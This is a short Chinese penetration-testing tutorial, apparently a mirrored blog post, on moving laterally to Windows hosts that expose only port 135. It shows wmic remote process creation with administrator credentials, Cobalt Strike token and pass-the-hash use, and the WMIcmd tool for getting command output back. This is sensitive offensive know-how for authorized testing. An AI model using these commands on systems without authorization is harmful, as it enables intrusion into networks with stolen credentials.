[内网渗透]通过135端口进行横向 - 走看看

zoukankan html css js c++ java

[内网渗透]通过135端口进行横向
若内网中有windows机器只开放了135端口，可通过wmi进行执行命令横向

前提：拥有目标凭证
```
wmic /node:<IP> /user:administrator /password:<password> process call create "cmd.exe /c ipconfig > C:ipconfig.txt"
```
在CS中如果有令牌或pth可以不用帐号密码
```
make_token administrator <password>
# pth administrator <hash>
wmic /node:<IP> process call create "cmd.exe /c ipconfig > C:ipconfig.txt"
```
可是这样执行命令没有回显，如何能有回显？

使用WMIcmd

https://github.com/nccgroup/WMIcmd

但是有个前提是要知道hostname（不在域内的机器）或域名（在域内的机器）
```
WMIcmd.exe -h 192.168.77.171 -d WIN-887RATLMALI -u administrator -p 123456 -c whoami
```
查看全文

相关阅读:
python面向对象的3个特点
 Redis-哈希槽
 PEP8 Python 编码规范
 每个人都要对自己进行5 项必要投资
 机器码和字节码
 python优缺点分析及python种类
 Zookeeper安装及运行
 Zookeeper简介与集群搭建
 Nginx Linux详细安装部署教程
 Nginx代理功能与负载均衡详解

原文地址：https://www.cnblogs.com/rnss/p/15508646.html

Copyright © 2011-2022 走看看